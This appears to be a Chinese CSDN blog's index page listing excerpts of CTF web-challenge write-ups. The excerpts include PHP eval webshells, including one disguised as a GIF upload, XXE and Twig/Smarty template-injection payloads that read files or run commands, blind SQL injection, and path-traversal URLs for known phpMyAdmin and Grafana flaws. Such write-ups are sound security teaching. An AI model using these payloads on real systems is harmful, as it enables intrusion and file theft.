自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(47)
  • 收藏
  • 关注

原创 堆&Use After Free

堆 & UAF

2022-08-19 17:35:43 413 1

原创 【BUUCTF】[极客大挑战 2019]RCE ME

源码首先是PHP正则绕过,有长度限制,考虑使用取反绕过首先试试看看phpinfo重点看这个禁用函数,禁用了很多函数下一步试着传木马蚁剑连接一下,显然这里需要但是由于禁用了命令执行的函数,这里要进行绕过网上有两种方法,一种是使用蚁剑的插件,科学上网才能下载得到另一种是通过 & 绕过这里不做详细讲述了,具体可以看看我的个人博客here上传文件后使用PL...

2022-07-09 14:50:44 612 2

原创 【BUUCTF】[Zer0pts2020]Can you guess it?

源码想要读取文件只能从这段入手(不知道另外一处有没有办法),正则表达式是表示不能以config.php为结尾这里学习一个新知识接下来是basename它有个小问题,它会去掉文件名开头的非ASCII值。PL...

2022-06-08 21:21:46 427

原创 【BUUCTF】[SUCTF 2019]Pythonginx

这道题核心就是一个知识点,与编码漏洞idna与utf-8编码漏洞Black-Hat贴一个跑编码对照的脚本这道题很多方式绕过,可以用,刚好可以替代

2022-06-03 22:01:53 298

原创 【BUUCTF】[MRCTF2020]Ezpop

一道pop链的问题,反序列化漏洞进阶思路如下声明一个类,会调用方法我们让也是一个类,则会调用其方法我们接下来让是一个类,其没有属性,则会调用方法我们最后让是类,就会执行方法,同时注意最核心的方法中有函数,可以使用php伪协议读文件pop链构造依次如下最后exp如下最后总结使用到的魔法函数的知识...

2022-06-03 15:19:27 541

原创 【BUUCTF】[网鼎杯 2020 朱雀组]phpweb

BP抓包发现了突破口func=file_get_contents&p=index.php拿到源码 <?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert",

2022-05-31 17:18:46 168

原创 【BUUCTF】[BSidesCF 2019]Futurella

检查拿到代码<?php#error_reporting(0);class HelloPhp{ public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s"; $this->b = "date"; } public function __destruct(){ $a = $this->a;

2022-05-19 22:14:53 446 1

原创 【BUUCTF】[De1CTF 2019]SSRF Me

源码#! /usr/bin/env python# #encoding=utf-8from flask import Flaskfrom flask import requestimport socketimport hashlibimport urllibimport sysimport osimport jsonreload(sys)sys.setdefaultencoding('latin1') app = Flask(__name__) secert_key = os

2022-05-06 22:05:30 239

原创 【BUUCTF】[CISCN 2019 初赛]Love Math

源码<?phperror_reporting(0);//听说你很喜欢数学,不知道你是否爱它胜过爱flagif(!isset($_GET['c'])){ show_source(__FILE__);}else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { die("太长了不会算"); } $blacklist = [' ', '\t', '

2022-05-05 18:53:21 414 1

原创 【BUUCTF】[WesternCTF2018]shrine

源码import flaskimport osapp = flask.Flask(__name__)app.config['FLAG'] = os.environ.pop('FLAG')@app.route('/')def index(): return open(__file__).read()@app.route('/shrine/<path:shrine>')def shrine(shrine): def safe_jinja(s):

2022-05-05 17:41:15 610

原创 【BUUCTF】[安洵杯 2019]easy_serialize_php

直接看到源码<?php$function = @$_GET['f'];function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img);}if($_SESSION){ unset($_SESSION)

2022-05-03 21:28:19 1262

原创 【BUUCTF】[WUSTCTF2020]朴实无华

为什么打开robots.txt,一是看见源码中有提示,二是应该在没有思路时作为常规操作显示flag也不会在里面打开这个文件,看见源码<img src="/img.jpg"><?phpheader('Content-type:text/html;charset=utf-8');error_reporting(0);highlight_file(__file__);//level 1if (isset($_GET['num'])){ $num = $_GET.

2022-05-01 22:24:47 1613

原创 【BUUCTF】[安洵杯 2019]easy_web

开幕破防属于是。。。观察urlhttp://dc66bac4-e3ff-492e-b89e-6ddf6f65ab2b.node4.buuoj.cn:81/index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=img后面的像是一个base64加密后的字符串,cmd参数没有,尝试输入什么每什么反应,那就对这个字符串下手显然还要进行一次一串数字,hex解码是一个图片名,可以推断存在任意文件读取漏洞,我们将index.php进行hex->b.

2022-04-30 17:24:20 1822

原创 【BUUCTF】[NCTF2019]Fake XML cookbook

bp抓包观察,username和password是以xml文件形式post的学习从XML相关一步一步到XXE漏洞用最基本的XXE攻击<?xml version="1.0" encoding="utf-8"?><!DOCTYPE a [<!ENTITY user SYSTEM "file:///flag">]><user><username>&user;</username><password>123&

2022-04-30 16:19:13 300

原创 【BUUCTF】[BJDCTF2020]Cookie is so stable

flag页面比较容易看出来存在SSTI看见有wp说是Twig模板注入,copy一下判断方法尝试{{7*7}}, 返回49尝试{{7*‘7’}},返回49,说明是Twig模板,但是如果返回7777777,则说明是Jinia2模板不同的模板的攻击方式不同,贴一个好文章一篇文章带你理解漏洞之 SSTI 漏洞用PL{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}但是在输入框.

2022-04-30 16:06:16 226

原创 【BUUCTF】[强网杯 2019]高明的黑客

拿到的源码有3000多个文件,所有文件都是杂乱的网上wp感觉对题目的理解部分讲解较少,结合蚁剑工具,我觉得题目意思像是说这里面的文件是一句话木马,我们要找到合适的GET或POST参数能执行shell命令。用脚本暴力跑完所有文件的所有参数,技术不行,只能贴别人的代码import osimport requestsimport reimport threadingimport timeprint('开始时间: '+ time.asctime( time.localtime(time.ti.

2022-04-26 16:53:56 2306

原创 【BUUCTF】[GWCTF 2019]我有一个数据库

还以为是电脑出问题了。。。没啥东西就用dirsearch扫描,扫描出来有PHPmyadmin关于phpmyadmin 4.8.1的漏洞问题,移步这里(CVE-2018-12613)phpmyadmin 4.8.1这道题最终完整payloadphpmyadmin/?target=db_datadict.php%253f/../../../../../../../../flag......

2022-04-24 16:25:43 1065

原创 【BUUCTF】[BSidesCF 2020]Had a bad day

注意到url中的参数category,以为是注入点,实际上输入其他的只会一个错误说明用php伪协议读取文件/index.php?category=php://filter/convert.base64-encode/resource=index解密拿到代码 <?php $file = $_GET['category']; if(isset($file)) { if( strpos( $file, "woofers" ) !== false || st.

2022-04-24 15:33:17 767

原创 【BUUCTF】[BJDCTF2020]The mystery of ip

X-Forwarded-For看到题目,要首先想到这个BP在http头里面增加X-Forwarded-For,发现是可控的,可能存在模板注入让X-Forwarded-For={{7*7}}接下来常规思路注入命令X-Forwarded-For={{system("cat /flag")}}过程没什么好说的,贴一下源码<?php require_once('header.php'); require_once('./libs/Smarty.class.php'); $

2022-04-23 15:02:39 367

原创 【BUUCTF】[CISCN2019 华东南赛区]Double Secret

尝试/secret?secret=1输入长一点发现出现了报错,这个页面是flask应用开启了debug模式后运行出错的表现,在较老版本的flask中可以直接在这个页面中打开python控制台运行代码,而在较新版本的flask中要打开python控制台需要输入一个pin码仔细观察报错,不难发现一处引人注目,单独拎出来审计代码 if(secret==None): return 'Tell me your secret.I will encrypt it so others ca.

2022-04-22 23:26:40 1823 2

原创 【BUUCTF】[RoarCTF 2019]Easy Java

点击help,发现拿不到help.docx根据wp,这里使用hackbar发post才能拿到文件java web 文件格式src/main/java: 这个目录一般是存放web项目的Java源文件的src/main/resource: 这个目录一般是存放相关的配置文件src/main/webapp: 这个目录一般是和web应用相关的webapp下的文件目录是容易出现安全问题的/WEB-INF/web.xml: Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则.

2022-04-17 16:42:14 906

原创 【*CTF】 oh-my-grafana

Grafana任意文件读取漏洞(CVE-2021-43798)有空另一个blog里复现一波,这里直接写wp/public/plugins/alertlist/…/…/…/…/…/…/…/…/…/…/…/etc/grafana/grafana.ini 查看配置文件在配置文件里面可以找到admin的默认密码成功登录进去后,尝试根据配置文件中的数据库信息登录数据库然后在explore中可以得到flag...

2022-04-17 15:53:23 1816

原创 【BUUCTF】[BJDCTF2020]ZJCTF,不过如此

看看源码<?phperror_reporting(0);$text = $_GET["text"];$file = $_GET["file"];if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"; if(preg

2022-04-14 15:41:47 1222

原创 【BUUCTF】[GXYCTF2019]禁止套娃

dirsearch扫描目录发现存在git泄露于是用GitHack 生成index.php<?phpinclude "flag.php";echo "flag在哪里呢?<br>";if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) { if(';' === preg_replace('/[a-z,_]+\

2022-04-13 21:01:27 825

原创 【BUUCTF】[CISCN2019 华北赛区 Day2 Web1]Hack World

明确告诉了flag的位置输入1输入其他的基本上都没有错误回显或者信息,采用bool盲注fuzz一波发现select没有过滤,空格过滤了1^(ascii(substr((select(flag)from(flag)),1,1))>127)正常回显,说明方法可行脚本跑出每一个字符即可import requestsimport timeurl='http://10cb7823-c884-4555-80b8-f586b15e6057.node4.buuoj.cn:81/index..

2022-04-11 17:37:54 741 3

原创 【BUUCTF】[网鼎杯 2018]Fakebook

随便注册一个账户后,点击进去url中的no引人注意,尝试no=0出现了很多信息,感觉像是sql注入,于是no=1’试试好,这里存在注入漏洞,一套连招下来,发现union被过滤,select存活,但是据说可以用/**/绕过,反正是没怎么过滤,想怎么来怎么来不想写中间过程了,轻松爆出了数据库名、表名,看看最后几步?no=1 and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.co

2022-04-09 14:50:38 726

原创 【BUUCTF】[SUCTF 2019]CheckIn

废话不多讲,老生常谈的文件上传题目需要传一个图片马GIF89a<script language='php'>@eval($_POST['abc']);</script>还有一个.user.ini文件文件上传之.user.iniGIF89aauto_prepend_file=upload.jpg作用是指定在主文件之前自动解析的文件的名称,并包含该文件,就像使用require函数调用它一样。蚁剑链接http://c8a6d5ca-0f52-4c27-a06f-

2022-04-09 11:35:04 479

原创 【BUUCTF】[ZJCTF 2019]NiZhuanSiWei

源码<?php $text = $_GET["text"];$file = $_GET["file"];$password = $_GET["password"];if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br&g

2022-04-08 22:15:12 996

原创 【BUUCTF】[网鼎杯 2020 青龙组]AreUSerialz

不带演的,直接给出了源代码<?phpinclude("flag.php");highlight_file(__FILE__);class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile"; $

2022-04-07 16:48:36 314

原创 【BUUCTF】[极客大挑战 2019]PHP

打开网站提示说有备份文件dirsearch扫描下载www.zip查看重要文件class.php<?phpinclude 'flag.php';error_reporting(0);class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct($username,$password){ $this-&

2022-04-06 21:21:37 931 1

原创 如何用docker搭建N1BOOK题目的环境

文章目录前言配置一台CentOS7安装docker和docker-compose编辑docker-compose.yml前言在做BUU的N1Book题目的时候,遇到一些题目wp是自己搭建靶机,这样能更好的看到靶机实际的变化,能有更深的理解,于是自己索性也想这样尝试,一干就是小半个晚上<_>!!配置一台CentOS7教程照这个教程基本上没有问题安装docker和docker-compose同样的用现有教程教程踩了个雷,可能遇到这样问题解决方法根据提示在命令结尾加上–allo

2022-04-05 23:34:38 1938 1

原创 【BUUCTF】N1BOOK WEB WP

文章目录常见的搜集粗心的小李SQL注入-1SQL注入-2afr_1afr_2常见的搜集粗心的小李git泄露,用scrabble工具得到一个网页打开即可SQL注入-1SQL注入-2afr_1afr_2

2022-03-29 17:00:32 2222

原创 【picoCTF 2022 一些题目的wp】

picoCTF 2022 一些题目的wp这里记录一下picoCTF 2022 中做出来的题目文章目录WEB1.Includes2.Inspect HTML3.Local Authority4.Search source5.Forbidden Paths6.Power CookieCrypto1.WEB1.Includes打开开发者工具,在style.css中看见flag2.Inspect HTML查看源代码3.Local Authority密码找到4.Search sourceC

2022-03-27 12:31:41 1588

原创 CTF——MD5总结

文章目录1.MD5简介2.弱类型比较的MD5绕过3.强类型比较的MD5绕过4.MD5构造攻击语句1.MD5简介MD5是一种常见的加密方式,但准确来说,它只是一种编码方式,它将任意有限长度的字符串通过哈希函数转换为特定长度的字符串。MD5编码具有单向性,即由明文变密文简单,由密文变明文困难。破解时只能通过暴力破解即穷举法所以基于这个特性,MD5可以有效保证信息的完整性,当文件进行一点点的修改,MD5值都会有很大的改变。MD5生成的密文由2进制表示——128位构成由16进制表示——32位(大小写

2022-03-15 21:54:41 2658 2

原创 【BUUCTF】[RoarCTF 2019]Easy Calc1

题目网页是一个计算器查看源代码发现线索calc.php直接访问这里对eval对get的内容执行,尝试注入php代码前面也说了waf,我们这里利用php解析字符串的特性来绕过PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事:1)删除空白符2)将某些字符转换为下划线(包括空格)图片来源博客PHP字符串解析特性 ($GET/$POST参数绕过)(含例题 buuctf easycalc)_bin789456的博客-CS...

2022-03-14 21:59:10 360

原创 【BUUCTF】[极客大挑战 2019]Upload1

试着上传一个一句话木马的.jpg文件<?phpeval($_GET['abc']); ?>看样子是不能用php,必须换一种语言仅仅更改文件后缀不能完全绕过,这里使用GIF89a头文件欺骗GIF89a图片头文件欺骗上传成功了,接下来我们在BP中上传,截获数据包,并且把...

2022-03-13 00:24:26 952 1

原创 【BUUCTF】[ACTF2020 新生赛]BackupFile1

突破口在题目标题,BackupFile——备份文件常见的备份文件后缀名有 .git .svn.swp .~ .bak .bash_history这道题目是.bak输入index.php.bak后可以下载得到代码比较简单输入的key必须是数,然后转换为整数和字符串key比较这里涉及php弱类型比较php弱类型比较所以本题目只需要构造payload?key=123...

2022-03-12 22:04:15 3469

原创 【BUUCTF】[极客大挑战 2019]Http1

第一步也是看网上wp才知道是什么。。鼠标光标放在“氛围”上会发现左下角的提示我们使用bp抓包这里告诉我们用Referer头Referer:https://Sycsecret.buuoj.cn修改UAUser-Agent:Syclover使用X-Forwarded-For:127.0.0.1X-Forwarded-For...

2022-03-08 22:08:50 149

原创 【BUUCTF】[HCTF 2018]WarmUp1

一道php代码审计题目打开网页源代码,发现提示访问/source页面想要看到某个文件得通过checkFile函数第一步page要在白名单里面查看hint预备知识mb_substr()strpos字符串拼接用'.'第二步这里的代码含义就是将page后面加上?,然后将第一次出现?前的字符串赋值给_page,然后_page是否在白名单中第三步只比第二步多了一个将url编码,所以对?我们进行双重url编码即可...

2022-03-07 23:02:56 148

原创 【BUUCTF】[极客大挑战 2019]Knife1

注意到网页标题白给的shell这里使用蚁剑登录然后在目录中一通瞎找

2022-03-07 20:42:40 4146

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除